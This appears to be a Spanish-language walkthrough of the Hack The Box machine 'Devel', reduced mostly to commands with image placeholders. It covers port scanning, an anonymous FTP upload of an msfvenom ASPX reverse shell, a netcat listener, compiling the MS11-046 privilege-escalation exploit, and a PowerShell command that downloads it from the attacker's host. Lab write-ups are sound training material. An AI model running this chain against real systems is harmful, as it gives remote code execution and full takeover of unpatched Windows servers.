echo "10.129.140.124 devel.htb" | sudo tee -a /etc/hosts

nmap -A -p- -oA output 10.129.140.124 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210423190315.png

nmap -sC -sV -O -p- -oA devel 10.129.140.124

nmap -sU -O -p- -oA devel-udp 10.129.140.124

nikto -h 10.129.138.158:80

Pasted image 20210304210150.png

gobuster dir -k -u http://devel.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

Pasted image 20210423190546.png

   anonymous
   put bar.txt

Pasted image 20210423191030.png

msfvenom --list payloads | grep windows
msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=3333 -f aspx > shell.aspx

Pasted image 20210423191401.png

   bin
   put shell.aspx

Para poder ejecutarlo hacemos un curl al nuevo script

curl http://devel.htb/shell.aspx

Pasted image 20210423191555.png

nc -lvnp 3333

whoami /priv

Pasted image 20210423192052.png

msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=1337 -f exe > reverse.exe

Pasted image 20210423193443.png

cd c:\users
dir

systeminfo

Pasted image 20210423193838.png

Buscamos el exploit de MS11–046 y vemos el EDB-ID es 40564

#actualizar searchsploit para conseguir lo mas nuevo searchsploit -u

searchsploit -m 40564

apt-get updateapt-get install mingw-w64

Compilamos el exploit de acuerdo a las instrucciones en exploitdb

i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32

Pasted image 20210423200140.png

python3 -m http.server 8888

En la maquina de windows no tiene netcat pero powershell si

cd Public\Downloads

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.18:8888/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"

dir

Pasted image 20210423200916.png

   whoami

Pasted image 20210423201048.png

boxes

copyright©2022 Cu3rv0x all rights reserved